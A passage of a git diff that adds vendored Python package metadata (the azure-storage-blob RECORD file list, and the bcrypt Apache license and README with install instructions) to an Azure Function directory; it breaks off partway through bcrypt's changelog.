b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/RECORD new file mode 100644 index 0000000..7aaa7ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/RECORD @@ -0,0 +1,150 @@ +azure/storage/blob/__init__.py,sha256=bPV07iW0lXdYMBC0y67BwrIXyzB9_Mdj3sNGNj9qJkY,9297 +azure/storage/blob/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc,, +azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc,, +azure/storage/blob/__pycache__/_container_client.cpython-39.pyc,, +azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc,, +azure/storage/blob/__pycache__/_download.cpython-39.pyc,, +azure/storage/blob/__pycache__/_lease.cpython-39.pyc,, +azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc,, +azure/storage/blob/__pycache__/_models.cpython-39.pyc,, +azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc,, +azure/storage/blob/__pycache__/_serialize.cpython-39.pyc,, +azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc,, +azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc,, +azure/storage/blob/__pycache__/_version.cpython-39.pyc,, +azure/storage/blob/_blob_client.py,sha256=oS_f_-vQTEqP36-QULYgY6nG9JR1Nb1RlWTYM9FqVmc,215964 +azure/storage/blob/_blob_service_client.py,sha256=UOo4L_jUr5KoivqwFu_TnHk7UZCZNsZwKXD8B6_vhhY,34604 +azure/storage/blob/_container_client.py,sha256=M61zCsPCsPzhmNuEKc9ap1o3KsVnpW9X_bc2rpKtKPE,81125 +azure/storage/blob/_deserialize.py,sha256=Mq-DQCoj6z1A7nqFH4cVt3IpU3YngOm8v1kpxJFf8Rw,8060 +azure/storage/blob/_download.py,sha256=dDIupMbxZwpnPiFb0oYniCMH7DEvWhdmeicl4cYCo1w,25503 +azure/storage/blob/_generated/__init__.py,sha256=VWdzOuqJvcA-A6D2CNPkf4EcvmMWjL9EiQBGXjuAtcA,779 +azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc,, +azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc,, +azure/storage/blob/_generated/_azure_blob_storage.py,sha256=bGYdDxc4nwfknLt7Mz1764CBSISWDYyzFJqG6aMDYVE,4907 +azure/storage/blob/_generated/_configuration.py,sha256=PDjVM2__i_Laq_V_ZbEwCytfzl16sdv81SxWu0zNvPo,2821 +azure/storage/blob/_generated/_patch.py,sha256=O3WqSw6Y7KNXtwLAglfxuizkuFeyzm2-WJYksgull1U,1529 +azure/storage/blob/_generated/_vendor.py,sha256=F5rnE0tJotT9NJvZIGN1zlAFXANoIfWvHFLhsSUM-fM,1197 +azure/storage/blob/_generated/aio/__init__.py,sha256=VWdzOuqJvcA-A6D2CNPkf4EcvmMWjL9EiQBGXjuAtcA,779 +azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc,, +azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc,, +azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc,, +azure/storage/blob/_generated/aio/_azure_blob_storage.py,sha256=HCWv3o5Ztc3LTJ_nssDTO-1onMm1QgPsiXQY6Is0WSI,4767 +azure/storage/blob/_generated/aio/_configuration.py,sha256=Y6nC4y1bSPtlItBD92tKnN1_zG0FLtb_5qb1Bpn9IFE,2653 +azure/storage/blob/_generated/aio/_patch.py,sha256=O3WqSw6Y7KNXtwLAglfxuizkuFeyzm2-WJYksgull1U,1529 +azure/storage/blob/_generated/aio/operations/__init__.py,sha256=lMczAvvIgMN4G93Gh8gKPFvRzLmBovBu6TRFC2A2Yf8,957 +azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_append_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_block_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_container_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_page_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/__pycache__/_service_operations.cpython-39.pyc,, +azure/storage/blob/_generated/aio/operations/_append_blob_operations.py,sha256=DcfKmuQCbsmThijjvg1ieQOV17ODmyAeVFso9yXmWWI,36933 +azure/storage/blob/_generated/aio/operations/_blob_operations.py,sha256=qjWP-euzY9tVKsYANb61k45Asw_mBY4FDsTYNwiZSCQ,163444 +azure/storage/blob/_generated/aio/operations/_block_blob_operations.py,sha256=_aw4koSWODxzfkwHS-W9Ocx3TWjIhMoL55siuccIlPM,59370 +azure/storage/blob/_generated/aio/operations/_container_operations.py,sha256=fRP7LACujZ2wtOaKTx4oLHATs4MmuVh5dUPs4rzbYqQ,92506 +azure/storage/blob/_generated/aio/operations/_page_blob_operations.py,sha256=zjmsPx8moy0-NKFggQaWwamZP4hWDQPg9nmn9K3WSaU,76370 +azure/storage/blob/_generated/aio/operations/_service_operations.py,sha256=Q4ethNAxa-gMOQEMWoP3ciyFhIuy7nopBusuYy0vDzI,35307 +azure/storage/blob/_generated/models/__init__.py,sha256=-WrZs3lZLO5nfKgh55BKRlB-Mvcmoh5FvTKowI7NxM4,8345 +azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc,, +azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc,, +azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc,, +azure/storage/blob/_generated/models/_azure_blob_storage_enums.py,sha256=2pMN19XgZuuULeu0EBBvAklS9EbYTtGjtawU6ysQeqo,12288 +azure/storage/blob/_generated/models/_models.py,sha256=mSJM68n6LDY31MQq2y8K1WwRJUZnyjPm4gdiqwCNfMM,103782 +azure/storage/blob/_generated/models/_models_py3.py,sha256=-6LyO-ApKEjHQDTvh28cgNexSdJXD1rq2DW6IeVOpoc,110664 +azure/storage/blob/_generated/operations/__init__.py,sha256=lMczAvvIgMN4G93Gh8gKPFvRzLmBovBu6TRFC2A2Yf8,957 +azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc,, +azure/storage/blob/_generated/operations/_append_blob_operations.py,sha256=rOnS58Lt9SYoO5egHYsWYD23nEG3sR9VtL2o0j9iZXk,59637 +azure/storage/blob/_generated/operations/_blob_operations.py,sha256=MjNgcxZVL4TNyrQhcv0DX2ry32bbvfOnVmHoVTbpbHE,242157 +azure/storage/blob/_generated/operations/_block_blob_operations.py,sha256=NSxvPe6E9IYwXmCQji1zeU2Sx4JfWh4FrO1pseA-MMQ,96200 +azure/storage/blob/_generated/operations/_container_operations.py,sha256=5uOE9Qy9u3aP3kPb1vFu6Soy0Uugqhsu7tU8y82gufo,134896 +azure/storage/blob/_generated/operations/_page_blob_operations.py,sha256=U8-VZzF-BRPBbT2ev4KSm0BboJxGcxEFTfQOWLcz6js,121685 +azure/storage/blob/_generated/operations/_service_operations.py,sha256=YP-bACw9ksXNsZtjFgNc2kanE0Qvo6CleE73yXiGLpY,50251 +azure/storage/blob/_lease.py,sha256=wVtbtCrSetuVHszyRp22gFoKU8NM7HwxBkCBJe2rBu4,16639 +azure/storage/blob/_list_blobs_helper.py,sha256=400ImGGOqG95DuVzwO39Xw0t-gEkrexj2P--pSfSwU4,11076 +azure/storage/blob/_models.py,sha256=FlEX5FKlQOEI1hllUk3R28Fel4NYuMVHWvMULVicWnw,57292 +azure/storage/blob/_quick_query_helper.py,sha256=_KzHY8Q8X8qSkksP_IMO_u2m2OKMkRcePhurZlKFtmo,6270 +azure/storage/blob/_serialize.py,sha256=meZPhxav0c0_Hv-4SAzSm8WGVvJY7Fcbj5vsngQY_X8,7864 +azure/storage/blob/_shared/__init__.py,sha256=-uU6OPLpjp10tnpV0K9D2YliO26Nswlralgt5oeYEyU,1529 +azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc,, +azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc,, +azure/storage/blob/_shared/authentication.py,sha256=PLgxffD8xSzi0z4y2WeomaLVMMG9HwwqxVjWzwev_AM,6701 +azure/storage/blob/_shared/avro/__init__.py,sha256=Ch-mWS2_vgonM9LjVaETdaW51OL6LfG23X-0tH2AFjw,310 +azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc,, +azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc,, +azure/storage/blob/_shared/avro/avro_io.py,sha256=_j-9w8LrzwfuWWxODqBclOjBvQkGqOyQAVDXlEVvbOo,16446 +azure/storage/blob/_shared/avro/avro_io_async.py,sha256=SaESNFsrp8EjwQxTtoRoQ22UmSCd4ENBDHFgONovsYI,16593 +azure/storage/blob/_shared/avro/datafile.py,sha256=ALR5EBiBFn2JrVgMrp9EoMyvyqGi-4A4fUqYv8m7pnQ,8563 +azure/storage/blob/_shared/avro/datafile_async.py,sha256=aymkqV-R034RVW1dE2Y8Ga0RD8dkTa8bYkBH4N5S-V4,7334 +azure/storage/blob/_shared/avro/schema.py,sha256=ZVYobUzIjFwWA_ubPp0nj0pxXYSbtijFhgZlQ-v4y6w,36373 +azure/storage/blob/_shared/base_client.py,sha256=9leyqfVgzGjKqb5mrv1WkaqFhskPmzi-hKjGS3r3FSc,17790 +azure/storage/blob/_shared/base_client_async.py,sha256=3yEQZ3zyDTEDwSSRGLxaBwcZOYLj6wbDj1g0YwcyU6U,7050 +azure/storage/blob/_shared/constants.py,sha256=1uo6pz8tD050yoVw5mEwH2DoOmJhTVWhizz3e-g9Mxk,704 +azure/storage/blob/_shared/encryption.py,sha256=L181TZUELDH40mW-J3tOH-NJNkYk_aFfu3h3zYLkf0E,22608 +azure/storage/blob/_shared/models.py,sha256=SQWC08D5Z7Ya26aQQurgSR53nxOTZ2TGv3ho_SRWTuQ,20674 +azure/storage/blob/_shared/parser.py,sha256=eOg-G0FOrddsj2fw5OLkMghdc5Uffp-qOtrSWYJB7A4,617 +azure/storage/blob/_shared/policies.py,sha256=IhvgCo3t_-fPRJ0GM8KGZOWAosLStmhDhlC2AffgJT4,28970 +azure/storage/blob/_shared/policies_async.py,sha256=EyoiZh6KkkRrqwYKAD0pFpD68aUERAVTYP_7Et0Etkk,11530 +azure/storage/blob/_shared/request_handlers.py,sha256=4UqOnr1SWJXzCsfoAqHAH8yMaLMXVn3Yq4-IW5zfvdY,10014 +azure/storage/blob/_shared/response_handlers.py,sha256=qqzP2MEPOnv_lUK07_SjaKhoVfiss4Yb5kOcTk55p88,8640 +azure/storage/blob/_shared/shared_access_signature.py,sha256=fLNnJhNnSI_g4nCcapdSSgWX5OfgI_0rxWgNMUZF2ys,10330 +azure/storage/blob/_shared/uploads.py,sha256=nDfR_EUQcEsbzd8LvaPEztupgfxGBMXjTmbgsD8X2mU,22746 +azure/storage/blob/_shared/uploads_async.py,sha256=mEQx_nq7WeB0XhG2u6dSlc3S_vaDO-1fqjxLkbt3kEk,15229 +azure/storage/blob/_shared_access_signature.py,sha256=nUDKhhgUOiInYUb0FjwzKZvwtKrkFqGiF9yrx-qCGaU,31629 +azure/storage/blob/_upload_helpers.py,sha256=DEzS6BbPr-mvrvPL9_qcfgCSK8Cc3cx2w6WUZZQuGpY,12810 +azure/storage/blob/_version.py,sha256=0kVintILK5ee_IztQ_9QzLOgxtLEvIg3sKyVH3t5RwY,331 +azure/storage/blob/aio/__init__.py,sha256=yKda-lZsPg5RpPtYKTtpCnp2SARN1z1w7GadwZzX7Hk,7001 +azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc,, +azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc,, +azure/storage/blob/aio/_blob_client_async.py,sha256=9qVba5natEDexGJndjUY6ydsQQEynNVuV0j2XbtKSLg,149107 +azure/storage/blob/aio/_blob_service_client_async.py,sha256=BCj5lUSEj7UMsHLYsY6JAHfX5ZNtg9CoolViylf9YNc,32623 +azure/storage/blob/aio/_container_client_async.py,sha256=J2qpatfghXvbufZ6ZcNYOMKQjG2t1osNwIcAyaZSgTs,64530 +azure/storage/blob/aio/_download_async.py,sha256=E-7MQ3xUCKbeKVS7GqxR6L70kLI_TqRT6z20QyzMuZs,22338 +azure/storage/blob/aio/_lease_async.py,sha256=0CzUaO7_8mCzzi2XrUXx_km3k1DHZq35ebu8mXecPC0,16327 +azure/storage/blob/aio/_list_blobs_helper.py,sha256=iXwnipb_QpTAD4lOEqQJrP8OpKTT8nEpSfEigk2o7PI,7905 +azure/storage/blob/aio/_models.py,sha256=e2sEBDN3163BIFtB64AByB0lMaUzrvLIFdn7k3xpTQA,7685 +azure/storage/blob/aio/_upload_helpers.py,sha256=ArTzbMpLXvuRu4o7YCvBPu5PTJIlOl7AKg5ZIcqQVlg,11914 +azure/storage/blob/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure_storage_blob-12.12.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +azure_storage_blob-12.12.0.dist-info/LICENSE,sha256=_VMkgdgo4ToLE8y1mOAjOKNhd0BnWoYu5r3BVBto6T0,1073 +azure_storage_blob-12.12.0.dist-info/METADATA,sha256=Yr2_YRkUM7lTHOBPZmKfi1fvbqbTBIok7k1918G9v3M,25418 +azure_storage_blob-12.12.0.dist-info/RECORD,, +azure_storage_blob-12.12.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +azure_storage_blob-12.12.0.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +azure_storage_blob-12.12.0.dist-info/top_level.txt,sha256=S7DhWV9m80TBzAhOFjxDUiNbKszzoThbnrSz5MpbHSQ,6 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/top_level.txt new file mode 100644 index 0000000..f6434ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_storage_blob-12.12.0.dist-info/top_level.txt @@ -0,0 +1 @@ +azure diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/LICENSE new file mode 100644 index 0000000..583bd5a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + +TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + +1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + +2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + +3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + +4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + +5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + +6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + +7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + +8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + +9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + +END OF TERMS AND CONDITIONS + +APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + +Copyright [yyyy] [name of copyright owner] + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/METADATA new file mode 100644 index 0000000..e269af9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/METADATA @@ -0,0 +1,271 @@ +Metadata-Version: 2.1 +Name: bcrypt +Version: 3.2.2 +Summary: Modern password hashing for your software and your servers +Home-page: https://github.com/pyca/bcrypt/ +Author: The Python Cryptographic Authority developers +Author-email: cryptography-dev@python.org +License: Apache License, Version 2.0 +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: Apache Software License +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +Requires-Dist: cffi (>=1.1) +Provides-Extra: tests +Requires-Dist: pytest (!=3.3.0,>=3.2.1) ; extra == 'tests' +Provides-Extra: typecheck +Requires-Dist: mypy ; extra == 'typecheck' + +bcrypt +====== + +.. image:: https://img.shields.io/pypi/v/bcrypt.svg + :target: https://pypi.org/project/bcrypt/ + :alt: Latest Version + +.. image:: https://github.com/pyca/bcrypt/workflows/CI/badge.svg?branch=main + :target: https://github.com/pyca/bcrypt/actions?query=workflow%3ACI+branch%3Amain + +Good password hashing for your software and your servers + + +Installation +============ + +To install bcrypt, simply: + +.. code:: bash + + $ pip install bcrypt + +Note that bcrypt should build very easily on Linux provided you have a C compiler, headers for Python (if you're not using pypy), and headers for the libffi libraries available on your system. + +For Debian and Ubuntu, the following command will ensure that the required dependencies are installed: + +.. code:: bash + + $ sudo apt-get install build-essential libffi-dev python-dev + +For Fedora and RHEL-derivatives, the following command will ensure that the required dependencies are installed: + +.. code:: bash + + $ sudo yum install gcc libffi-devel python-devel + +For Alpine, the following command will ensure that the required dependencies are installed: + +.. code:: bash + + $ apk add --update musl-dev gcc libffi-dev + + +Alternatives +============ + +While bcrypt remains a good choice for password storage depending on your specific use case you may also want to consider using scrypt (either via `standard library`_ or `cryptography`_) or argon2id via `argon2_cffi`_. + +Changelog +========= + +3.2.2 +----- + +* Fixed packaging of ``py.typed`` files in wheels so that ``mypy`` works. + +3.2.1 +----- + +* Added support for compilation on z/OS +* The next release of ``bcrypt`` with be 4.0 and it will require Rust at + compile time, for users building from source. There will be no additional + requirement for users who are installing from wheels. Users on most + platforms will be able to obtain a wheel by making sure they have an up to + date ``pip``. The minimum supported Rust version will be 1.56.0. +* This will be the final release for which we ship ``manylinux2010`` wheels. + Going forward the minimum supported manylinux ABI for our wheels will be + ``manylinux2014``. The vast majority of users will continue to receive + ``manylinux`` wheels provided they have an up to date ``pip``. + + +3.2.0 +----- + +* Added typehints for library functions. +* Dropped support for Python versions less than 3.6 (2.7, 3.4, 3.5). +* Shipped ``abi3`` Windows wheels (requires pip >= 20). + +3.1.7 +----- + +* Set a ``setuptools`` lower bound for PEP517 wheel building. +* We no longer distribute 32-bit ``manylinux1`` wheels. Continuing to produce + them was a maintenance burden. + +3.1.6 +----- + +* Added support for compilation on Haiku. + +3.1.5 +----- + +* Added support for compilation on AIX. +* Dropped Python 2.6 and 3.3 support. +* Switched to using ``abi3`` wheels for Python 3. If you are not getting a + wheel on a compatible platform please upgrade your ``pip`` version. + +3.1.4 +----- + +* Fixed compilation with mingw and on illumos. + +3.1.3 +----- +* Fixed a compilation issue on Solaris. +* Added a warning when using too few rounds with ``kdf``. + +3.1.2 +----- +* Fixed a compile issue affecting big endian platforms. +* Fixed invalid escape sequence warnings on Python 3.6. +* Fixed building in non-UTF8 environments on Python 2. + +3.1.1 +----- +* Resolved a ``UserWarning`` when used with ``cffi`` 1.8.3. + +3.1.0 +----- +* Added support for ``checkpw``, a 